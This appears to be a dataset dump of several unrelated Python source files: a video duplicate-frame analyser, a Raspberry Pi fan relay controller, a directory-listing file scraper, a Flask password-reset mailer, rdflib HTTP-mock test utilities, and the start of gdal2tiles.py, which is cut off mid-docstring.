source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
video_analyser.py
|
import argparse as argp
import multiprocessing.dummy as mp
from pathlib import Path
import time
import cv2
import pandas as pd
from tqdm import tqdm
def writer_write(writer, q):
while True:
frame = q.get()
if type(frame) == str and frame == "STOP":
return
writer.write(frame)
def writer_create(name: str, fps, size, q):
video_writer = cv2.VideoWriter(name, cv2.VideoWriter_fourcc(*"MJPG"), fps, size)
writer_write(video_writer, q)
video_writer.release()
return
def main(args):
cap = cv2.VideoCapture(args.INPUT)
total_frames = int(cap.get(cv2.CAP_PROP_FRAME_COUNT))
reported_fps = int(cap.get(cv2.CAP_PROP_FPS))
reported_bitrate = int(cap.get(cv2.CAP_PROP_BITRATE))
print("Total frames: {0}".format(total_frames))
print("Reported FPS: {0}".format(reported_fps))
print("Reported Bitrate: {0}kbps".format(reported_bitrate))
width = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))
height = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
size = (width, height)
original_path = None
if args.OUTPUT:
original_path = Path(args.OUTPUT)
else:
original_path = Path(args.INPUT)
original_name = original_path.stem
original_parent = original_path.parent
# Video with duplicated frames removed
result_queue = None
result_proc = None
if args.SAVE in (1, 3):
result_name = Path(original_parent).joinpath(original_name + "_result.avi")
result_name.unlink(missing_ok=True)
result_queue = mp.Queue()
result_proc = mp.Process(target=writer_create, args=(str(result_name), reported_fps, size, result_queue,))
result_proc.start()
# Video with difference blend mode between original and result video
diff_queue = None
diff_proc = None
if args.SAVE in (2, 3):
diff_name = Path(original_parent).joinpath(original_name + "_diff.avi")
diff_name.unlink(missing_ok=True)
diff_queue = mp.Queue()
diff_proc = mp.Process(target=writer_create, args=(str(diff_name), reported_fps, size, diff_queue,))
diff_proc.start()
frames = []
frame_number = -1
prev_frame = None
# with tqdm(total=total_frames, unit="frames") as prog_bar:
time_start = time.time()
prog_bar = tqdm(total=total_frames, unit="frames", leave=True)
while(cap.isOpened()):
frame_number += 1
prog_bar.set_description("Processing frame number {}".format(frame_number))
prog_bar.update(1)
ret, frame = cap.read()
if frame_number == 0:
prev_frame = frame.copy()
continue
try:
# frame_gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
# prev_frame_gray = cv2.cvtColor(prev_frame, cv2.COLOR_BGR2GRAY)
# frame_diff = cv2.absdiff(frame_gray, prev_frame_gray)
frame_diff = cv2.absdiff(frame, prev_frame)
if diff_queue is not None:
# diff_writer.write(frame_diff)
diff_queue.put(frame_diff)
mean = frame_diff.mean()
if mean > args.THRESHOLD:
frames.append(True)
if result_queue is not None:
# result_writer.write(frame)
result_queue.put(frame)
else:
frames.append(False)
prev_frame = frame.copy()
except KeyboardInterrupt:
exit(1)
except Exception as e:
# print("\r\n{0}".format(e))
if frame_number > total_frames:
break
else:
continue
if frame_number > total_frames:
break
time_stop = time.time()
n = prog_bar.n
prog_bar.close()
msg = "Calculations "
cap.release()
if result_queue is not None:
print("Finishing writing to result video file.")
result_queue.put("STOP")
result_proc.join()
msg += "and writing to the result file "
if diff_queue is not None:
print("Finishing writing to difference video file.")
diff_queue.put("STOP")
diff_proc.join()
msg += "and writing to the difference file "
cv2.destroyAllWindows()
time_total = time_stop - time_start
app_fps = n / time_total
msg += "took {0} seconds to complete.\n"
msg += "Average frames calculated per second is {1}."
print(msg.format(time_total, app_fps))
res = [i for i in frames if i]
times = dict()
base = float((1 / reported_fps) * 1000)
for i in range(len(res)):
if i == 0:
times[i] = base
else:
times[i] = base + (base * (res[i] - res[i - 1]))
data = dict()
data["frame number"] = []
data["frametime"] = []
data["framerate"] = []
for k, v in times.items():
data["frame number"].append(k)
data["frametime"].append(v)
if v == 0:
data["framerate"].append("INF")
else:
data["framerate"].append(1 / (v / 1000))
df = pd.DataFrame.from_dict(data)
frametime_stats = pd.DataFrame(df, columns=["frametime"])
framerate_stats = pd.DataFrame(df, columns=["framerate"])
stats_basic = dict()
stats_frametime_dict = dict()
stats_framerate_dict = dict()
stats_basic["Number of Unique Frames"] = [int(sum(frames))]
stats_basic["Number of Duplicated Frames"] = [int(len(frames) - sum(frames))]
if len(frames) == 0:
stats_basic["Percentage of Unique Frames"] = ["0 %"]
stats_basic["Percentage of Duplicated Frames"] = ["0 %"]
else:
stats_basic["Percentage of Unique Frames"] = ["{} %".format(sum(frames) / len(frames) * 100)]
stats_basic["Percentage of Duplicated Frames"] = ["{} %".format(stats_basic["Number of Duplicated Frames"][0] / len(frames) * 100)]
stats_frametime_dict["Lowest"] = dict(frametime_stats.min(axis=0))
stats_frametime_dict["Highest"] = dict(frametime_stats.max(axis=0))
stats_frametime_dict["Mean"] = dict(frametime_stats.mean(axis=0))
stats_frametime_dict["Median"] = dict(frametime_stats.median(axis=0))
stats_frametime_dict["0.1 Percent Lows"] = dict(frametime_stats.quantile(q=0.001, axis=0))
stats_frametime_dict["1 Percent Lows"] = dict(frametime_stats.quantile(q=0.01, axis=0))
stats_frametime_dict["99 Percent Lows"] = dict(frametime_stats.quantile(q=0.99, axis=0))
stats_frametime_dict["99.9 Percent Lows"] = dict(frametime_stats.quantile(q=0.999, axis=0))
stats_framerate_dict["Lowest"] = dict(framerate_stats.min(axis=0))
stats_framerate_dict["Highest"] = dict(framerate_stats.max(axis=0))
stats_framerate_dict["Mean"] = dict(framerate_stats.mean(axis=0))
stats_framerate_dict["Median"] = dict(framerate_stats.median(axis=0))
stats_framerate_dict["0.1 Percent Lows"] = dict(framerate_stats.quantile(q=0.001, axis=0))
stats_framerate_dict["1 Percent Lows"] = dict(framerate_stats.quantile(q=0.01, axis=0))
stats_framerate_dict["99 Percent Lows"] = dict(framerate_stats.quantile(q=0.99, axis=0))
stats_framerate_dict["99.9 Percent Lows"] = dict(framerate_stats.quantile(q=0.999, axis=0))
stats_basic_df = pd.DataFrame.from_dict(stats_basic)
stats_frametime_df = pd.DataFrame.from_dict(stats_frametime_dict)
stats_framerate_df = pd.DataFrame.from_dict(stats_framerate_dict)
stats_joined = pd.concat([stats_frametime_df, stats_framerate_df], axis=0)
print("\nStatistics")
print(stats_basic_df.transpose().to_string(header=False))
print("\n", stats_joined.transpose().to_string())
csv_name = Path(original_parent).joinpath(original_name + "_report.csv")
csv_name.unlink(csv_name)
df.to_csv(csv_name, index=False)
# stats_joined.to_csv(csv_name)
# with open(csv_name, "w", newline="\n") as csv_file:
# df.to_csv(csv_file, index=False)
def parse_arguments():
main_help = "Analyze framerate, frame drops, and frame tears of a video file.\n"
parser = argp.ArgumentParser(description=main_help, formatter_class=argp.RawTextHelpFormatter)
parser.add_argument("INPUT", type=str, help="Video File")
output_help = "Output filename (Default will be named after input file)."
parser.add_argument("-o", "--output", dest="OUTPUT", type=str, help=output_help)
threshold_help = "Pixel difference threshold to count as duplicate frames, must be an integer between 0 and 255.\n"
threshold_help += "A value of 0 will count all all frames as unique, while 255 will only count\n"
threshold_help += "frames that are 100 percent different (Default: 5)."
parser.add_argument("-t", "--threshold", dest="THRESHOLD", type=int, default=5, help=threshold_help)
save_help = "Save the video frames of the video with duplicated frames removed and/or the video showing the difference between the original and deduplicated frame video.\n"
save_help += "A value of 0 will not save any video files.\n"
save_help += "A value of 1 will only save the version with duplicated frames removed.\n"
save_help += "A value of 2 will only save the version that shows the difference between the original and the deduplicated video.\n"
save_help += "A value of 3 will save both of the videos from options 1 and 2.\n"
save_help += "Note that saving the video file(s) can drastically increase the program's runtime. (Default: 0)"
parser.add_argument("-s", "--save", dest="SAVE", action="store", type=int, default=0, choices=[0, 1, 2, 3], help=save_help)
args = parser.parse_args()
if args.THRESHOLD < 0 or args.THRESHOLD > 255:
parser.error("Value {0} for \"threshold\" argument was not within the range of 0 to 255".format(args.THRESHOLD))
exit(1)
return(args)
if __name__ == "__main__":
args = parse_arguments()
main(args)
|
vanee_controller.py
|
import time
import threading
import logging
import queue
import signal
import sys
from datetime import datetime, timedelta
import RPi.GPIO as GPIO
logging.basicConfig(level=logging.DEBUG, format="%(asctime)s:%(name)s:%(message)s")
MAX_HIGH_TIME = timedelta(minutes=60)
HIGH_TIME_STEP = timedelta(minutes=15)
RELAY_PIN = 37
INPUT_PIN = 7
# remap relay states so that the "reset" state when GPIO.cleanup() is called is low speed
RELAY_LOW_STATE = GPIO.HIGH
RELAY_HIGH_STATE = GPIO.LOW
def button_watcher(q, quit_event):
logger = logging.getLogger("button")
while True:
if quit_event.is_set():
return
input_state = GPIO.input(INPUT_PIN)
if input_state:
logger.info('button press detected')
q.put(True)
time.sleep(0.2)
def relay_switcher(q, quit_event):
next_low_time = datetime.utcnow()
logger = logging.getLogger("relay")
while True:
if quit_event.is_set():
return
if not q.empty():
item = q.get()
next_low_time = min(
datetime.utcnow() + MAX_HIGH_TIME,
max(datetime.utcnow(), next_low_time) + HIGH_TIME_STEP
)
logger.info("set next low time to %s", next_low_time)
if next_low_time > datetime.utcnow():
logger.info("%d seconds until next low time, set relay to high", (next_low_time - datetime.utcnow()).total_seconds())
GPIO.output(RELAY_PIN, RELAY_HIGH_STATE)
else:
logger.info("next low time is in the past, set relay to low")
GPIO.output(RELAY_PIN, RELAY_LOW_STATE)
time.sleep(1)
def cleanup(t1, t2):
logger = logging.getLogger("cleanup")
logger.info("attempting to close threads")
quit_event.set()
t1.join()
t2.join()
logger.info("threads successfully closed")
logger.info("shutting down... setting relay to low")
GPIO.output(RELAY_PIN, RELAY_LOW_STATE)
time.sleep(1)
logger.info("calling GPIO.cleanup")
GPIO.cleanup()
sys.exit()
if __name__ == '__main__':
logger = logging.getLogger("main")
GPIO.setwarnings(False)
GPIO.setmode(GPIO.BOARD)
GPIO.setup(INPUT_PIN, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)
GPIO.setup(RELAY_PIN, GPIO.OUT)
logger.info("startup... setting relay to low")
GPIO.output(RELAY_PIN, RELAY_LOW_STATE)
q = queue.Queue(10)
quit_event = threading.Event()
quit_event.clear()
t1 = threading.Thread(name='button_watcher', target=button_watcher, args=(q, quit_event))
t2 = threading.Thread(name='relay_switcher', target=relay_switcher, args=(q, quit_event))
logger.info("starting threads")
t1.start()
t2.start()
signal.signal(signal.SIGTERM, lambda *args: cleanup(t1, t2))
try:
while True:
time.sleep(60)
except KeyboardInterrupt:
cleanup(t1, t2)
|
indexer.py
|
from bs4 import BeautifulSoup as bs
import os
import threading
import requests
from time import sleep, ctime
host = "http://index-of.co.uk/"
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 6.3; Win64; x64) \
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36"} # spoofed user agent
fully_retrieved_dir = []
def main():
try:
if not os.path.isfile(os.getcwd()+"/retrieved_dir.dmd"): # checking if retrieved_dir.dmd file exists
with open(os.getcwd()+"/retrieved_dir.dmd", "w") as f: # else create it
pass
with open(os.getcwd()+"/retrieved_dir.dmd", "r") as f: #opening for reading
dirs = f.readlines()
if dirs != []: # if the retrieved_dir.dmd file has been written to b4
for dir in dirs:
dir = dir.strip("\n")
if dir in site_dir_list:
site_dir_list.remove(dir)
create_threads() # call create threads function
except Exception:
save()
#exit() # exit cleanly
def create_threads():
try:
threads_list = []
for i in range(6): # i want to be creating 5 threads at a time
if site_dir_list != []: # checking in case the remaining directories are less than five
new_thread = threading.Thread(target=start_job, args=()) #create the thread with a directory
threads_list.append(new_thread) # sending the thread to the list
for i in range(len(threads_list)):
threads_list[i].start() # initiate threading
sleep(1)
for i in range(len(threads_list)):
threads_list[i].join()
except Exception:
save()
def start_job():
while site_dir_list != []:
dir = site_dir_list[-1]
site_dir_list.remove(dir)
get_links(dir)
save()
def get_links(dir):
try:
with requests.Session() as s:
page = s.get(host+"/"+dir, headers=headers) #open the page of the current directory
if not os.path.isdir(os.getcwd()+"/"+dir): #check if the directory has not been created
os.mkdir(os.getcwd()+"/"+dir) # create the directory
files_link = get_files_link(page.content) # call the function that retrieve and returns the links
files_link = remove_duplicate(files_link) # u get the point
with requests.Session() as s:
for link in files_link:
file_name = validate_filename(link)
if not os.path.isfile(os.getcwd()+"/"+dir+file_name):
file_get = s.get(host+"/"+dir+link, headers=headers)
with open(os.getcwd()+"/"+dir+file_name, "wb") as f:
f.write(file_get.content)
print("Retrieved %s \n"%(file_name,))
fully_retrieved_dir.append(dir)
except Exception:
save()
def validate_filename(link):
try:
name = link.replace("%20", "_")
return name
except Exception:
save()
def get_files_link(page):
try:
links = []
soup = bs(str(page), "html.parser")
a_tags = soup.find_all("a")
for a in a_tags:
link = a["href"]
if link_is_file(link):
links.append(link)
return links
except Exception:
save()
def remove_duplicate(links):
unique_links = [] #this list does not contain duplicates
for link in links:
if link not in unique_links:
unique_links.append(link)
return unique_links
# performs simple checks if don't get this too, this code is not for u
def is_link_dir(link):
try:
if link[:4] == "http":
return False
elif link[-1] != "/":
return False
elif not link[0].isupper():
return False
else:
return True
except Exception:
save()
def link_is_file(link):
try:
if link[:4] == "http":
return False
elif link[-1] == "/":
return False
elif not link[0].isupper():
return False
else:
return True
except Exception:
save()
#this function is called to save the name of directories that have been retrieved
def save():
with open(os.getcwd()+"/retrieved_dir.dmd", "a") as f:
if fully_retrieved_dir != []:
for i in range(len(fully_retrieved_dir)):
f.write(fully_retrieved_dir[i]+"\n")
for i in fully_retrieved_dir:
fully_retrieved_dir.remove(i)
#this function retrieve the link of dirs from the site
def get_site_dir_list():
try:
links = []
with requests.Session() as s:
open_homepage = s.get(host, headers=headers) #opening the homepage of the site
homepage = open_homepage.content # this is trivial
soup = bs(str(homepage), "html.parser")
a_tags = soup.find_all("a")
all_links = []
for a in a_tags:
link = a["href"] #extracting the link text with bs
all_links.append(link)
for link in all_links:
if is_link_dir(link):
links.append(link)
return links
except Exception:
save()
#placed here cos the function needs to be initialized
site_dir_list = get_site_dir_list() # get the directory link from the site
site_dir_list = remove_duplicate(site_dir_list) # this fucntion remove duplicate links
main()
#if __name__=="__main__":
# main()
|
email.py
|
# coding : utf-8
from flask_mail import Message
from app import mail
from flask import render_template
from app import app
from threading import Thread
def send_password_reset_email(user):
token = user.get_reset_password_token()
send_email('[Microblog] Reset Your Password',
sender=app.config['ADMINS'][0],
recipients=[user.email],
text_body=render_template('email/reset_password.txt',
user=user, token=token),
html_body=render_template('email/reset_password.html',
user=user, token=token))
def send_async_email(app, msg):
with app.app_context():
mail.send(msg)
def send_email(subject, sender, recipients, text_body, html_body):
msg = Message(subject, sender=sender, recipients=recipients)
msg.body = text_body
msg.html = html_body
Thread(target=send_async_email, args=(app, msg)).start()
|
testutils.py
|
from __future__ import print_function
import os
import sys
from types import TracebackType
import isodate
import datetime
import random
from contextlib import AbstractContextManager, contextmanager
from typing import (
Callable,
Iterable,
List,
Optional,
TYPE_CHECKING,
Type,
Iterator,
Set,
Tuple,
Dict,
Any,
TypeVar,
cast,
NamedTuple,
)
from urllib.parse import ParseResult, unquote, urlparse, parse_qs
from traceback import print_exc
from threading import Thread
from http.server import BaseHTTPRequestHandler, HTTPServer, SimpleHTTPRequestHandler
import email.message
import unittest
from rdflib import BNode, Graph, ConjunctiveGraph
from rdflib.term import Node
from unittest.mock import MagicMock, Mock
from urllib.error import HTTPError
from urllib.request import urlopen
from pathlib import PurePath, PureWindowsPath
from nturl2path import url2pathname as nt_url2pathname
if TYPE_CHECKING:
import typing_extensions as te
# TODO: make an introspective version (like this one) of
# rdflib.graphutils.isomorphic and use instead.
from test import TEST_DIR
def crapCompare(g1, g2):
"""A really crappy way to 'check' if two graphs are equal. It ignores blank
nodes completely and ignores subgraphs."""
if len(g1) != len(g2):
raise Exception("Graphs dont have same length")
for t in g1:
s = _no_blank(t[0])
o = _no_blank(t[2])
if not (s, t[1], o) in g2:
e = "(%s, %s, %s) is not in both graphs!" % (s, t[1], o)
raise Exception(e)
def _no_blank(node):
if isinstance(node, BNode):
return None
if isinstance(node, Graph):
return None # node._Graph__identifier = _SQUASHED_NODE
return node
def check_serialize_parse(fpath, infmt, testfmt, verbose=False):
g = ConjunctiveGraph()
_parse_or_report(verbose, g, fpath, format=infmt)
if verbose:
for t in g:
print(t)
print("========================================")
print("Parsed OK!")
s = g.serialize(format=testfmt)
if verbose:
print(s)
g2 = ConjunctiveGraph()
_parse_or_report(verbose, g2, data=s, format=testfmt)
if verbose:
print(g2.serialize())
crapCompare(g, g2)
def _parse_or_report(verbose, graph, *args, **kwargs):
try:
graph.parse(*args, **kwargs)
except:
if verbose:
print("========================================")
print("Error in parsing serialization:")
print(args, kwargs)
raise
def get_random_ip(parts: List[str] = None) -> str:
if parts is None:
parts = ["127"]
for _ in range(4 - len(parts)):
parts.append(f"{random.randint(0, 255)}")
return ".".join(parts)
@contextmanager
def ctx_http_server(
handler: Type[BaseHTTPRequestHandler], host: str = "127.0.0.1"
) -> Iterator[HTTPServer]:
server = HTTPServer((host, 0), handler)
server_thread = Thread(target=server.serve_forever)
server_thread.daemon = True
server_thread.start()
yield server
server.shutdown()
server.socket.close()
server_thread.join()
class GraphHelper:
@classmethod
def triple_set(cls, graph: Graph) -> Set[Tuple[Node, Node, Node]]:
return set(graph.triples((None, None, None)))
@classmethod
def triple_sets(cls, graphs: Iterable[Graph]) -> List[Set[Tuple[Node, Node, Node]]]:
result: List[Set[Tuple[Node, Node, Node]]] = []
for graph in graphs:
result.append(cls.triple_set(graph))
return result
@classmethod
def equals(cls, lhs: Graph, rhs: Graph) -> bool:
return cls.triple_set(lhs) == cls.triple_set(rhs)
GenericT = TypeVar("GenericT", bound=Any)
def make_spypair(method: GenericT) -> Tuple[GenericT, Mock]:
m = MagicMock()
def wrapper(self: Any, *args: Any, **kwargs: Any) -> Any:
m(*args, **kwargs)
return method(self, *args, **kwargs)
setattr(wrapper, "mock", m)
return cast(GenericT, wrapper), m
HeadersT = Dict[str, List[str]]
PathQueryT = Dict[str, List[str]]
class MockHTTPRequests(NamedTuple):
method: str
path: str
parsed_path: ParseResult
path_query: PathQueryT
headers: email.message.Message
class MockHTTPResponse(NamedTuple):
status_code: int
reason_phrase: str
body: bytes
headers: HeadersT
class SimpleHTTPMock:
"""
SimpleHTTPMock allows testing of code that relies on an HTTP server.
NOTE: Currently only the GET and POST methods is supported.
Objects of this class has a list of responses for each method (GET, POST, etc...)
and returns these responses for these methods in sequence.
All request received are appended to a method specific list.
Example usage:
>>> httpmock = SimpleHTTPMock()
>>> with ctx_http_server(httpmock.Handler) as server:
... url = "http://{}:{}".format(*server.server_address)
... # add a response the server should give:
... httpmock.do_get_responses.append(
... MockHTTPResponse(404, "Not Found", b"gone away", {})
... )
...
... # send a request to get the first response
... http_error: Optional[HTTPError] = None
... try:
... urlopen(f"{url}/bad/path")
... except HTTPError as caught:
... http_error = caught
...
... assert http_error is not None
... assert http_error.code == 404
...
... # get and validate request that the mock received
... req = httpmock.do_get_requests.pop(0)
... assert req.path == "/bad/path"
"""
# TODO: add additional methods (PUT, PATCH, ...) similar to GET and POST
def __init__(self):
self.do_get_requests: List[MockHTTPRequests] = []
self.do_get_responses: List[MockHTTPResponse] = []
self.do_post_requests: List[MockHTTPRequests] = []
self.do_post_responses: List[MockHTTPResponse] = []
_http_mock = self
class Handler(SimpleHTTPRequestHandler):
http_mock = _http_mock
def _do_GET(self):
parsed_path = urlparse(self.path)
path_query = parse_qs(parsed_path.query)
request = MockHTTPRequests(
"GET", self.path, parsed_path, path_query, self.headers
)
self.http_mock.do_get_requests.append(request)
response = self.http_mock.do_get_responses.pop(0)
self.send_response(response.status_code, response.reason_phrase)
for header, values in response.headers.items():
for value in values:
self.send_header(header, value)
self.end_headers()
self.wfile.write(response.body)
self.wfile.flush()
return
(do_GET, do_GET_mock) = make_spypair(_do_GET)
def _do_POST(self):
parsed_path = urlparse(self.path)
path_query = parse_qs(parsed_path.query)
request = MockHTTPRequests(
"POST", self.path, parsed_path, path_query, self.headers
)
self.http_mock.do_post_requests.append(request)
response = self.http_mock.do_post_responses.pop(0)
self.send_response(response.status_code, response.reason_phrase)
for header, values in response.headers.items():
for value in values:
self.send_header(header, value)
self.end_headers()
self.wfile.write(response.body)
self.wfile.flush()
return
(do_POST, do_POST_mock) = make_spypair(_do_POST)
def log_message(self, format: str, *args: Any) -> None:
pass
self.Handler = Handler
self.do_get_mock = Handler.do_GET_mock
self.do_post_mock = Handler.do_POST_mock
def reset(self):
self.do_get_requests.clear()
self.do_get_responses.clear()
self.do_get_mock.reset_mock()
self.do_post_requests.clear()
self.do_post_responses.clear()
self.do_post_mock.reset_mock()
@property
def call_count(self):
return self.do_post_mock.call_count + self.do_get_mock.call_count
class SimpleHTTPMockTests(unittest.TestCase):
def test_example(self) -> None:
httpmock = SimpleHTTPMock()
with ctx_http_server(httpmock.Handler) as server:
url = "http://{}:{}".format(*server.server_address)
# add two responses the server should give:
httpmock.do_get_responses.append(
MockHTTPResponse(404, "Not Found", b"gone away", {})
)
httpmock.do_get_responses.append(
MockHTTPResponse(200, "OK", b"here it is", {})
)
# send a request to get the first response
with self.assertRaises(HTTPError) as raised:
urlopen(f"{url}/bad/path")
assert raised.exception.code == 404
# get and validate request that the mock received
req = httpmock.do_get_requests.pop(0)
self.assertEqual(req.path, "/bad/path")
# send a request to get the second response
resp = urlopen(f"{url}/")
self.assertEqual(resp.status, 200)
self.assertEqual(resp.read(), b"here it is")
httpmock.do_get_responses.append(
MockHTTPResponse(404, "Not Found", b"gone away", {})
)
httpmock.do_get_responses.append(
MockHTTPResponse(200, "OK", b"here it is", {})
)
class ServedSimpleHTTPMock(SimpleHTTPMock, AbstractContextManager):
"""
ServedSimpleHTTPMock is a ServedSimpleHTTPMock with a HTTP server.
Example usage:
>>> with ServedSimpleHTTPMock() as httpmock:
... # add a response the server should give:
... httpmock.do_get_responses.append(
... MockHTTPResponse(404, "Not Found", b"gone away", {})
... )
...
... # send a request to get the first response
... http_error: Optional[HTTPError] = None
... try:
... urlopen(f"{httpmock.url}/bad/path")
... except HTTPError as caught:
... http_error = caught
...
... assert http_error is not None
... assert http_error.code == 404
...
... # get and validate request that the mock received
... req = httpmock.do_get_requests.pop(0)
... assert req.path == "/bad/path"
"""
def __init__(self, host: str = "127.0.0.1"):
super().__init__()
self.server = HTTPServer((host, 0), self.Handler)
self.server_thread = Thread(target=self.server.serve_forever)
self.server_thread.daemon = True
self.server_thread.start()
def stop(self) -> None:
self.server.shutdown()
self.server.socket.close()
self.server_thread.join()
@property
def address_string(self) -> str:
(host, port) = self.server.server_address
return f"{host}:{port}"
@property
def url(self) -> str:
return f"http://{self.address_string}"
def __enter__(self) -> "ServedSimpleHTTPMock":
return self
def __exit__(
self,
__exc_type: Optional[Type[BaseException]],
__exc_value: Optional[BaseException],
__traceback: Optional[TracebackType],
) -> "te.Literal[False]":
self.stop()
return False
class ServedSimpleHTTPMockTests(unittest.TestCase):
def test_example(self) -> None:
with ServedSimpleHTTPMock() as httpmock:
# add two responses the server should give:
httpmock.do_get_responses.append(
MockHTTPResponse(404, "Not Found", b"gone away", {})
)
httpmock.do_get_responses.append(
MockHTTPResponse(200, "OK", b"here it is", {})
)
# send a request to get the first response
with self.assertRaises(HTTPError) as raised:
urlopen(f"{httpmock.url}/bad/path")
assert raised.exception.code == 404
# get and validate request that the mock received
req = httpmock.do_get_requests.pop(0)
self.assertEqual(req.path, "/bad/path")
# send a request to get the second response
resp = urlopen(f"{httpmock.url}/")
self.assertEqual(resp.status, 200)
self.assertEqual(resp.read(), b"here it is")
httpmock.do_get_responses.append(
MockHTTPResponse(404, "Not Found", b"gone away", {})
)
httpmock.do_get_responses.append(
MockHTTPResponse(200, "OK", b"here it is", {})
)
def eq_(lhs, rhs, msg=None):
"""
This function mimicks the similar function from nosetest. Ideally nothing
should use it but there is a lot of code that still does and it's fairly
simple to just keep this small pollyfill here for now.
"""
if msg:
assert lhs == rhs, msg
else:
assert lhs == rhs
PurePathT = TypeVar("PurePathT", bound=PurePath)
def file_uri_to_path(
file_uri: str,
path_class: Type[PurePathT] = PurePath, # type: ignore[assignment]
url2pathname: Optional[Callable[[str], str]] = None,
) -> PurePathT:
"""
This function returns a pathlib.PurePath object for the supplied file URI.
:param str file_uri: The file URI ...
:param class path_class: The type of path in the file_uri. By default it uses
the system specific path pathlib.PurePath, to force a specific type of path
pass pathlib.PureWindowsPath or pathlib.PurePosixPath
:returns: the pathlib.PurePath object
:rtype: pathlib.PurePath
"""
is_windows_path = isinstance(path_class(), PureWindowsPath)
file_uri_parsed = urlparse(file_uri)
if url2pathname is None:
if is_windows_path:
url2pathname = nt_url2pathname
else:
url2pathname = unquote
pathname = url2pathname(file_uri_parsed.path)
result = path_class(pathname)
return result
|
gdal2tiles.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# ******************************************************************************
# $Id$
#
# Project: Google Summer of Code 2007, 2008 (http://code.google.com/soc/)
# Support: BRGM (http://www.brgm.fr)
# Purpose: Convert a raster into TMS (Tile Map Service) tiles in a directory.
# - generate Google Earth metadata (KML SuperOverlay)
# - generate simple HTML viewer based on Google Maps and OpenLayers
# - support of global tiles (Spherical Mercator) for compatibility
# with interactive web maps a la Google Maps
# Author: Klokan Petr Pridal, klokan at klokan dot cz
# Web: http://www.klokan.cz/projects/gdal2tiles/
# GUI: http://www.maptiler.org/
#
###############################################################################
# Copyright (c) 2008, Klokan Petr Pridal
# Copyright (c) 2010-2013, Even Rouault <even dot rouault at mines-paris dot org>
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
# ******************************************************************************
from __future__ import print_function, division
import math
from multiprocessing import Pipe, Pool, Process, Manager
import os
import tempfile
import threading
import shutil
import sys
from uuid import uuid4
from xml.etree import ElementTree
from osgeo import gdal
from osgeo import osr
try:
from PIL import Image
import numpy
import osgeo.gdal_array as gdalarray
numpy_available = True
except ImportError:
# 'antialias' resampling is not available
numpy_available = False
__version__ = "$Id$"
resampling_list = ('average', 'near', 'bilinear', 'cubic', 'cubicspline', 'lanczos', 'antialias')
profile_list = ('mercator', 'geodetic', 'raster')
webviewer_list = ('all', 'google', 'openlayers', 'leaflet', 'none')
threadLocal = threading.local()
# =============================================================================
# =============================================================================
# =============================================================================
__doc__globalmaptiles = """
globalmaptiles.py
Global Map Tiles as defined in Tile Map Service (TMS) Profiles
==============================================================
Functions necessary for generation of global tiles used on the web.
It contains classes implementing coordinate conversions for:
- GlobalMercator (based on EPSG:3857)
for Google Maps, Yahoo Maps, Bing Maps compatible tiles
- GlobalGeodetic (based on EPSG:4326)
for OpenLayers Base Map and Google Earth compatible tiles
More info at:
http://wiki.osgeo.org/wiki/Tile_Map_Service_Specification
http://wiki.osgeo.org/wiki/WMS_Tiling_Client_Recommendation
http://msdn.microsoft.com/en-us/library/bb259689.aspx
http://code.google.com/apis/maps/documentation/overlays.html#Google_Maps_Coordinates
Created by Klokan Petr Pridal on 2008-07-03.
Google Summer of Code 2008, project GDAL2Tiles for OSGEO.
In case you use this class in your product, translate it to another language
or find it useful for your project please let me know.
My email: klokan at klokan dot cz.
I would like to know where it was used.
Class is available under the open-source GDAL license (www.gdal.org).
"""
MAXZOOMLEVEL = 32
class GlobalMercator(object):
r"""
TMS Global Mercator Profile
---------------------------
Functions necessary for generation of tiles in Spherical Mercator projection,
EPSG:3857.
Such tiles are compatible with Google Maps, Bing Maps, Yahoo Maps,
UK Ordnance Survey OpenSpace API, ...
and you can overlay them on top of base maps of those web mapping applications.
Pixel and tile coordinates are in TMS notation (origin [0,0] in bottom-left).
What coordinate conversions do we need for TMS Global Mercator tiles::
LatLon <-> Meters <-> Pixels <-> Tile
WGS84 coordinates Spherical Mercator Pixels in pyramid Tiles in pyramid
lat/lon XY in meters XY pixels Z zoom XYZ from TMS
EPSG:4326 EPSG:387
.----. --------- -- TMS
/ \ <-> | | <-> /----/ <-> Google
\ / | | /--------/ QuadTree
----- --------- /------------/
KML, public WebMapService Web Clients TileMapService
What is the coordinate extent of Earth in EPSG:3857?
[-20037508.342789244, -20037508.342789244, 20037508.342789244, 20037508.342789244]
Constant 20037508.342789244 comes from the circumference of the Earth in meters,
which is 40 thousand kilometers, the coordinate origin is in the middle of extent.
In fact you can calculate the constant as: 2 * math.pi * 6378137 / 2.0
$ echo 180 85 | gdaltransform -s_srs EPSG:4326 -t_srs EPSG:3857
Polar areas with abs(latitude) bigger then 85.05112878 are clipped off.
What are zoom level constants (pixels/meter) for pyramid with EPSG:3857?
whole region is on top of pyramid (zoom=0) covered by 256x256 pixels tile,
every lower zoom level resolution is always divided by two
initialResolution = 20037508.342789244 * 2 / 256 = 156543.03392804062
What is the difference between TMS and Google Maps/QuadTree tile name convention?
The tile raster itself is the same (equal extent, projection, pixel size),
there is just different identification of the same raster tile.
Tiles in TMS are counted from [0,0] in the bottom-left corner, id is XYZ.
Google placed the origin [0,0] to the top-left corner, reference is XYZ.
Microsoft is referencing tiles by a QuadTree name, defined on the website:
